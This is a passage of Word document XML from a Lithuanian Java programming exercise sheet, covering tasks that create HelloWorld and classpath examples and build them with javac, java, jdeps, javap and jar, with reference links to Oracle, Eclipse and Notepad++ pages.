        <w:t>Patikriname komandų eilutėje JDK versiją: javac –version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. NAUDOJANT TEKSTINĮ  REDAKTORIŲ (PAVYZDŽIUI: NOTEPAD++) SUKURKITE JAVA PROJEKTĄ SU V</w:t>
      </w:r>
      <w:r w:rsidR="005D4648" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IENA JAVA KLASE HELLOWORLD.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00195CD5">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="907" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Tekstinio redaktoriaus notepad++ diegimo paketą galite atsiųsti iš čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Don Ho (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Notepad++ download</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId122" w:history="1">
        <w:r w:rsidRPr="00195CD5">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://notepad-plus-plus.org/download.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00195CD5">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pilnas klasės HelloWorld turin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com.oracle.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HelloWorl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Hello World! (Text edit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lastRenderedPageBreak/>
        <w:t>Sukurtą klasę patalpiname kataloge com/oracle/javabasics, kur com yra pagrindinis katalogas, o oracle ir javabasics yra vidiniai katalogai. Daugiau informacijos apie Java paketų pavadinimus ir katalogų struktūrą rasite čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00151BE1" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00592C55">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Lesson: Packages</w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId123" w:history="1">
        <w:r w:rsidR="00A858DD" w:rsidRPr="00151BE1">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/javase/tutorial/java/package/index.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00151BE1">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">4 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NAUDOJANT INTEGRUOTĄ KŪRIMO APLINKĄ (PAVYZDŽIUI: ECLIPSE) SUKURKITE JAVA PROJEKTĄ SU V</w:t>
      </w:r>
      <w:r w:rsidR="00B07098" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IENA JAVA KLASE HELLOWORLD.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00592C55">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="907" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Integruotos kūrimo aplinkos Eclipse diegimo paketą galite atsiųsti iš čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Eclipse (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Download Eclipse Technology that is right for you</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId124" w:history="1">
        <w:r w:rsidRPr="00592C55">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.eclipse.org/downloads.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00592C55">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Java projekto kūrimo ir konfigūracijos instrukcija:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E25848" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> JavaTutorialHQ (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>First Java programm</w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId125" w:history="1">
        <w:r w:rsidR="00A858DD" w:rsidRPr="00E25848">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://javatutorialhq.com/java/java-hello-world.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00E25848">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pilnas klasės HelloWorld turin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com.oracle.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HelloWorl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Hello World! (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outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD"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NAUDOJANT JAVA KOMANDINĖS EILUTĖS ĮRANKIUS JAVAC IR JAVA, SURINKITE IR PALEISKITE  UŽDUOTYJE PARAŠYTĄ HELLOWORLD PROGRAMĄ</w:t>
      </w:r>
      <w:r w:rsidR="0022717E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="907" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Javac ir java įrankių aprašymą rasite čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>JDK Tools and Utilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId126" w:history="1">
        <w:r w:rsidRPr="0022717E">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/javase/8/docs/technotes/tools/index.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0022717E">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Dirbame operacinės sistemos komandinėje eilutėje. Programos surinkimui naudojame komandą javac com/oracle/javabasics/HelloWorld.java (kur com/oracle/javabasics yra projekto katalogai), o surinktos programos paleidimui naudojame komandą java com.oracle.javabasics.HelloWorld.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. NAUDOJANT JAVA KOMANDINĖS EILUTĖS ĮRANKIUS JDEPS IR JAVAP, PATIKRINKITE UŽDUOTYJE PARAŠYTOS HELLOWORLD PROGRAMOS PRIKLAUSOMYBES IR PAŽ</w:t>
      </w:r>
      <w:r w:rsidR="005D4648" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IŪRĖKITE PROGRAMOS  „BYTE” KODĄ</w:t>
      </w:r>
      <w:r w:rsidR="00077D16">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="907" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jdeps ir javap įrankių aprašymą rasite čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>JDK Tools and Utilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId127" w:history="1">
        <w:r w:rsidRPr="00077D16">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/javase/8/docs/technotes/tools/index.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00077D16">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Dirbame operacinės sistemos komandinėje eilutėje. Programos priklausomybių patikrinimui naudojame komandą jdeps com/oracle/javabasics/HelloWorld.class. Programos “byte” kodą galite pažiūrėti su komanda javap -v com/oracle/javabasics/HelloWorld.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. NAUDOJANT JAVA KOMANDINĖS EILUTĖS ĮRANKĮ JAR SUKURKITE UŽDUOTYJE PARAŠYTOS HELLOWORLD PROGRAMOS</w:t>
      </w:r>
      <w:r w:rsidR="005D4648" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PALEIDŽIAMĄ ARCHYVĄ</w:t>
      </w:r>
      <w:r w:rsidR="00077D16">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="907" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jar įrankio aprašymą rasite čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>JDK Tools and Utilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId128" w:history="1">
        <w:r w:rsidRPr="00AE1089">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/javase/8/docs/technotes/tools/index.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AE1089">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dirbame operacinės sistemos komandinėje eilutėje. Surinkti paleidžiamą jar archyvą galite su komanda:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>jar cfe HelloWorld.jar com.oracle.javabasics.HelloWorld com/oracle/javabasics/HelloWorld.class</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Java Classpath parametras ir classloader</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. NAUDOJANT TEKSTINĮ  REDAKTORIŲ SUKURKITE JAVA PROJEKTĄ SU VIEN</w:t>
      </w:r>
      <w:r w:rsidR="00F7163F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>A JAVA KLASE JAVACLASSPATH.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00AE1089">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="907" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kodo surinkimui naudojame komandą javac JavaClasspath.java. Kodo paleidimui naudojame komandą java -classpath &lt;absoliutus kelias į jūsų projekto katalogą&gt; com.javabasics.JavaClasspath. Papildoma informacija apie Java Classpath:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Wikipedia (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Classpath (Java)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId129" w:history="1">
